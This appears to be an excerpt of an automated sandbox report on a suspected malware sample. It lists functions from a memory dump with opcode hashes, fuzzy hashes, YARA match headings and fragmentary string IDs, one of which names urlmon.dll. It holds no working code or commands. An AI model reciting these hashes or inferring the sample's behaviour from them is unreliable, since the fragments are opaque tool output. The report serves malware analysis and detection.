                                                                                                              • Instruction Fuzzy Hash: 95111C71600219AFEB10EB64DC41FEF77ACEB85718F104A5DF91867280E7717911CBA5
                                                                                                              Function 040CC1CD Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84e71adfc17259779c695fa82841e1606c22005ee5a0a2199eb411d7c1a32bf4
                                                                                                              • Instruction ID: 2d763fe768c6a8d15d5f17aa8c3587c521088270ce1aabd8d7a474bcc3de48b1
                                                                                                              • Opcode Fuzzy Hash: 84e71adfc17259779c695fa82841e1606c22005ee5a0a2199eb411d7c1a32bf4
                                                                                                              • Instruction Fuzzy Hash: 09115171600219BBE714EBA4CC41FEF77ACEF85614F00464DF968A7281E7707911CBA5
                                                                                                              Function 040C9FAD Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d45d86495cb2139ef5f64001e7e26dd56872a30c4358525eaa0886742a7f150a
                                                                                                              • Instruction ID: ad87f52f0b69c3b3450bda04583922d186d5f6de2a048fa57e9b004f47b0ab0e
                                                                                                              • Opcode Fuzzy Hash: d45d86495cb2139ef5f64001e7e26dd56872a30c4358525eaa0886742a7f150a
                                                                                                              • Instruction Fuzzy Hash: A3111FB6D0121DAF9B40DFE9D9409EEB7F9EF48204F04456AE919F7200E7706A148BE1
                                                                                                              Function 040CD09D Relevance: .0, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bcfb53bc329743492f1cc9e24520bba030b85acadce3a866105c5037dd4bb2b7
                                                                                                              • Instruction ID: 2f76ab3773e252f1858e8b8c8c844368527bbca036075117ee88321fdfa60047
                                                                                                              • Opcode Fuzzy Hash: bcfb53bc329743492f1cc9e24520bba030b85acadce3a866105c5037dd4bb2b7
                                                                                                              • Instruction Fuzzy Hash: 810180B2214209BBDB44DE99DC80EEB77ADEF8C754F108208BA1DE3241D670F951CBA4
                                                                                                              Function 040A73A1 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cb19f24b73e6bc40fc68ceb7ea728be606b79546628bd34ad92738f7fd58a24
                                                                                                              • Instruction ID: 3251bd1a9f8d49783488fc5b64871a8a388919fbf69dcb7e8cbd8a81d3ec5d7a
                                                                                                              • Opcode Fuzzy Hash: 4cb19f24b73e6bc40fc68ceb7ea728be606b79546628bd34ad92738f7fd58a24
                                                                                                              • Instruction Fuzzy Hash: 50F02B735142066BE7105A5DEC40B8AB7DCEB85334F254622FD5C97241E771E42183E0
                                                                                                              Function 040C8BDD Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca92d8924f0e9970766234136aff7f6f1b99f31090a2442167a8d9171357a78f
                                                                                                              • Instruction ID: 6e73c37a63c5b49608ec3eaf47fb31e00f4acd5c027776eccbbb1116fd57b43d
                                                                                                              • Opcode Fuzzy Hash: ca92d8924f0e9970766234136aff7f6f1b99f31090a2442167a8d9171357a78f
                                                                                                              • Instruction Fuzzy Hash: 1401D7B2D1121CAFDB40DFE8C841AEEBBF9AB18205F14466AE915F2240E7B056148BA5
                                                                                                              Function 040CC2CD Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 27c74bbb323ceb73799ea57c13b9572e8c980f3d016fb6b7da7ab104d113a374
                                                                                                              • Instruction ID: 9e8bc3f6642745facad7fd529e3a40d0b573d4bb9c38ed2c4e6650da4d67a142
                                                                                                              • Opcode Fuzzy Hash: 27c74bbb323ceb73799ea57c13b9572e8c980f3d016fb6b7da7ab104d113a374
                                                                                                              • Instruction Fuzzy Hash: C1F01CB5200205BFDB10EF99DC81EDB77ACEFC9614F004519F918A7241D670B9218BB1
                                                                                                              Function 040CCFBD Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                                              • Instruction ID: 24aec09486123df6b10271c51142fc115dfeba5e959fce19e5df3ef38e34e29a
                                                                                                              • Opcode Fuzzy Hash: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                                              • Instruction Fuzzy Hash: 7DE09A76200208BFDA14EF98DC81EDB37ADEFC9718F004418FA08A7241D7B0B9208BB4
                                                                                                              Function 040CD00D Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                                              • Instruction ID: 5848190510ef8fda3e5f72c6ccab748dbd57736fe2208adb1a554997c0005ad3
                                                                                                              • Opcode Fuzzy Hash: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                                              • Instruction Fuzzy Hash: 75E0ED76200204BFD614EE59DC45FDB77ADDFC5754F104419F918A7241D670B920C6B5
                                                                                                              Function 040BB97D Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3a07a4ac47d01758f3508b00628172b7b04893614590a8aef183a56a149d9904
                                                                                                              • Instruction ID: 04066829505fb79c62ce4dcb83ceec7ef5e40483ea146e490d80d657f1df88ed
                                                                                                              • Opcode Fuzzy Hash: 3a07a4ac47d01758f3508b00628172b7b04893614590a8aef183a56a149d9904
                                                                                                              • Instruction Fuzzy Hash: 5EF0827181520CEBDB14DF64D841BDEBBB4EB44320F1083ADE8689B280E634A7508785
                                                                                                              Function 040CEE5D Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 66681e0ee86a0fe01162f855277f87097eee629aa27c0071ddfbe2654a0ffdc5
                                                                                                              • Instruction ID: 56ef1de9ad5e718ac34e475df96757fe565cd13de5fc55a6ad04ac1929886f23
                                                                                                              • Opcode Fuzzy Hash: 66681e0ee86a0fe01162f855277f87097eee629aa27c0071ddfbe2654a0ffdc5
                                                                                                              • Instruction Fuzzy Hash: E2E04F32600214A7D6605789DC05FDFB7DCCBC1EA4F0900B9FE0CAB341E660B90142E5
                                                                                                              Function 040BB97C Relevance: .0, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e008c7241b31773ce0e3d17aa545c49cb6f2bd3af2fd17e03cb81aee7421ca6a
                                                                                                              • Instruction ID: 19bc1b2d5ffce283c14ef8ea23d96b7186f1d7cbbbc1dcc14e635ac2a1304b9a
                                                                                                              • Opcode Fuzzy Hash: e008c7241b31773ce0e3d17aa545c49cb6f2bd3af2fd17e03cb81aee7421ca6a
                                                                                                              • Instruction Fuzzy Hash: EFE06D71919108ABEB04CF64D881AEEBBB4DB05260F1083AEF819EB680D239A7548B45
                                                                                                              Function 040CCC8D Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                                              • Instruction ID: ac8ae8589c92b989251f4aeec93f0d27cfc76ec3d79013a5073f50888c6c1edd
                                                                                                              • Opcode Fuzzy Hash: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                                              • Instruction Fuzzy Hash: 07E04636250215BBD620FA59DC41EDB7B6CDFC5618F008529FA18A7240CAB0B92187A0
                                                                                                              Function 040A7429 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7c3aaba8e704109ca2b6628995f379dc3b70d48b94f8490df154b27a9d934da
                                                                                                              • Instruction ID: d4b881680dea2f517ed57da5b685c0e68a721dcc943f6429af06332f2e43a15f
                                                                                                              • Opcode Fuzzy Hash: a7c3aaba8e704109ca2b6628995f379dc3b70d48b94f8490df154b27a9d934da
                                                                                                              • Instruction Fuzzy Hash: 61D05E335A41168EC35A49ACA850458B3E4EA823313225772C8A4A71A1E321A076C691
                                                                                                              Function 040CED7D Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be1a69f92bacebee83dc76a8e5915979dfc30708ddf466f9b31faffeeecea4b3
                                                                                                              • Instruction ID: b2533bb6a5f5a118a978fc2fb6dae7975c0e52e243d0d9faa7d264c94a6a3385
                                                                                                              • Opcode Fuzzy Hash: be1a69f92bacebee83dc76a8e5915979dfc30708ddf466f9b31faffeeecea4b3
                                                                                                              • Instruction Fuzzy Hash: DAC080B15003087FD700DB8CDC45FA533DC9B08514F004094B90C9B341D570F9508774
                                                                                                              Function 040AE6A2 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4848c82133f05e92482fefa5166fbb6596653415f06278f6aa079bcfe88477e
                                                                                                              • Instruction ID: 8a7fc51dbba02cdf148d9f945488979172160e373e7f331edd0dc7cf1ef73892
                                                                                                              • Opcode Fuzzy Hash: a4848c82133f05e92482fefa5166fbb6596653415f06278f6aa079bcfe88477e
                                                                                                              • Instruction Fuzzy Hash: 55C02BE3D4075291DD5C20E301052E331220EC20183D885141DC358E41C740EC145702

                                                                                                              Non-executed Functions

                                                                                                              Function 040C614D Relevance: 34.0, Strings: 27, Instructions: 265COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                              • API String ID: 0-1002149817
                                                                                                              • Opcode ID: 2a37e670f33dfa6bcd3c026c1b6d9c4b456404d177648048e15c9432b6bb8fe7
                                                                                                              • Instruction ID: 3a62960871d714e5f17cfcc417ab881e3c0991632ae483cc39ed8e3042de0e90
                                                                                                              • Opcode Fuzzy Hash: 2a37e670f33dfa6bcd3c026c1b6d9c4b456404d177648048e15c9432b6bb8fe7
                                                                                                              • Instruction Fuzzy Hash: 48C11FB1D01228DAEB60DFA4CC44BEEBBB9AF45308F0085DDD548B7241D7B55A88CFA5
                                                                                                              Function 040BE82D Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • API String ID: 0-392141074
                                                                                                              • Opcode ID: 8d255134f41e2b9301b226b7d5322394ebfc8e358ead603c4a419195e07dd199
                                                                                                              • Instruction ID: decc224894b03788a52d4310ec3e7a5985d0b356e950c1b94ede01ce7b1572f6
                                                                                                              • Opcode Fuzzy Hash: 8d255134f41e2b9301b226b7d5322394ebfc8e358ead603c4a419195e07dd199
                                                                                                              • Instruction Fuzzy Hash: 71710EB1C10318AAEB15DB94CD80FEEB7BDAF48708F00859DE519B6180E7756748CFA5
                                                                                                              Function 040BE821 Relevance: 16.4, Strings: 13, Instructions: 178COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • API String ID: 0-392141074
                                                                                                              • Opcode ID: b849324bb3795617d87700a96484f7c29b86dd263f460d38342a7b969a4aa5f1
                                                                                                              • Instruction ID: 325b8b5c0527497677bcb1df3410128a40357b5ae1bcd3e477bc2ab137d430ff
                                                                                                              • Opcode Fuzzy Hash: b849324bb3795617d87700a96484f7c29b86dd263f460d38342a7b969a4aa5f1
                                                                                                              • Instruction Fuzzy Hash: E9611CB1C10318AAEB11DB94CC81FEEB7BDAF48708F00859DE519B6180E7756748CFA5
                                                                                                              Function 040B2505 Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                              • API String ID: 0-685823316
                                                                                                              • Opcode ID: 2c21b7153cf4abb0a8e4988dbfa880eee21dda974213b0238de0fbafb4b97b1b
                                                                                                              • Instruction ID: 5164649f3ee4597954d47b7359b306287cd8c8e91072ced3d621e5fd08ebd0c8
                                                                                                              • Opcode Fuzzy Hash: 2c21b7153cf4abb0a8e4988dbfa880eee21dda974213b0238de0fbafb4b97b1b
                                                                                                              • Instruction Fuzzy Hash: 773195B1D51218EEEF40DFD4CC44FEEBBB9AF04708F00815CE618BA180DBB556488BA4
                                                                                                              Function 040B9998 Relevance: 10.1, Strings: 8, Instructions: 134COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                                                              • API String ID: 0-620024284
                                                                                                              • Opcode ID: 0b4e5a1b491a7d3768c6fa62264b96f1767fd9d6c1a6fd97a16840d566608433
                                                                                                              • Instruction ID: 6353917442a185dcb90733c564f96e359698c4b36c2e8b3c74d37403d6ebdab7
                                                                                                              • Opcode Fuzzy Hash: 0b4e5a1b491a7d3768c6fa62264b96f1767fd9d6c1a6fd97a16840d566608433
                                                                                                              • Instruction Fuzzy Hash: 6C4194B5810218A6EB10EBA0DC40FEEB77DAF54308F0085DDA509B7141EBB5A7998FE1
                                                                                                              Function 040C69AD Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                              • API String ID: 0-3322591375
                                                                                                              • Opcode ID: 7de8a5cf9876ca80e83bcab69ce728ee54d93b93c75bab530e7fee8f6a8995d0
                                                                                                              • Instruction ID: fd027da755ffae844e334d390682a72c2232bad636b4a4a467e1f5494161ac95
                                                                                                              • Opcode Fuzzy Hash: 7de8a5cf9876ca80e83bcab69ce728ee54d93b93c75bab530e7fee8f6a8995d0
                                                                                                              • Instruction Fuzzy Hash: 914172B2C01218EADB10EF94DC84AEEB7F9AB48314F04859EE909B7100E77265458FD0
                                                                                                              Function 040AAA8D Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5$L$M$P$c$l$|
                                                                                                              • API String ID: 0-1638673873
                                                                                                              • Opcode ID: 966a6e67eea531772ed253b78fadb12929cde7be80afdf71f9f57264db2149ba
                                                                                                              • Instruction ID: 38c172f08ad672cd498b1a9721fe9cd02b035b9291972701fe48f258e903cafa
                                                                                                              • Opcode Fuzzy Hash: 966a6e67eea531772ed253b78fadb12929cde7be80afdf71f9f57264db2149ba
                                                                                                              • Instruction Fuzzy Hash: 2711C910D087CADDDB12CBBC88546AEBF715B23224F0887D9D4F52B2D2C2794716CBA6
                                                                                                              Function 040BDCF9 Relevance: 6.5, Strings: 5, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • API String ID: 0-2051669658
                                                                                                              • Opcode ID: 6c1d86a8af39ff99d49e02803fa2362bc33fcaaf185d0e2069a63029782cb204
                                                                                                              • Instruction ID: 23e9167ea56ab70e8c4d34c8fb8678961b383c9e18e3f3ee03e2bd574488505e
                                                                                                              • Opcode Fuzzy Hash: 6c1d86a8af39ff99d49e02803fa2362bc33fcaaf185d0e2069a63029782cb204
                                                                                                              • Instruction Fuzzy Hash: D7615BB2900208AFDB24DFA4CC80FEFB7F9AF48714F108559E559A7240E775BA45CBA4
                                                                                                              Function 040BDCFD Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • API String ID: 0-2051669658
                                                                                                              • Opcode ID: 3697de363eb896e2b020454b40e0b82728a0a7a0b0d832b45ea7465ba3331646
                                                                                                              • Instruction ID: 1d832a212c10a85b21e3284d7146cd21d779549e7ad9525501a00f971dbda702
                                                                                                              • Opcode Fuzzy Hash: 3697de363eb896e2b020454b40e0b82728a0a7a0b0d832b45ea7465ba3331646
                                                                                                              • Instruction Fuzzy Hash: 804118B1900308AFDB60DFA4CC84FEFBBF9AF48704F108559E559A7240E771AA45CBA4
                                                                                                              Function 040BD98D Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$k$o
                                                                                                              • API String ID: 0-3624523832
                                                                                                              • Opcode ID: 9e05ada99b83c8a3b079c16d71d43d2625ccabf8e644913574fd48004953c53d
                                                                                                              • Instruction ID: e3dcb3b31be293f6281b6e0eb4a4616fabad771843a321f8a6ea87e5e908a88d
                                                                                                              • Opcode Fuzzy Hash: 9e05ada99b83c8a3b079c16d71d43d2625ccabf8e644913574fd48004953c53d
                                                                                                              • Instruction Fuzzy Hash: 10B11CB5A00209AFDB64DFA4CC85FEFB7F9AF88704F108558F659A7240D674AA418B90
                                                                                                              Function 040BE2BD Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$h$o
                                                                                                              • API String ID: 0-3662636641
                                                                                                              • Opcode ID: 091d15c9c5d967f4d7de7ebd245eb62dccf97c1a17e28d501433bf5a23822ffe
                                                                                                              • Instruction ID: 7b605d2246dc546e96166fc1da6a0ddf792251f53ce5949fdfc6b2d60cee227a
                                                                                                              • Opcode Fuzzy Hash: 091d15c9c5d967f4d7de7ebd245eb62dccf97c1a17e28d501433bf5a23822ffe
                                                                                                              • Instruction Fuzzy Hash: 228145B2C4011AAAEB55EB94CC84FFEB3BDEF44308F0145A9E51966040EF7467858FE5
                                                                                                              Function 040BD84B Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • API String ID: 0-2877786613
                                                                                                              • Opcode ID: cbcf8b46e7dec437459d777e4a9619d9d7c154e535bd0415f5fbb7099e83eb9b
                                                                                                              • Instruction ID: 797a7194e4a80b44a2ec96a506e938b64e51c4cdc4455b51bde7e341a1cd3be8
                                                                                                              • Opcode Fuzzy Hash: cbcf8b46e7dec437459d777e4a9619d9d7c154e535bd0415f5fbb7099e83eb9b
                                                                                                              • Instruction Fuzzy Hash: 1E413871912229BAEB11EB90CC42FEF777DAF45A08F104149FA14BB180EB746A05C7A7
                                                                                                              Function 040BD84D Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
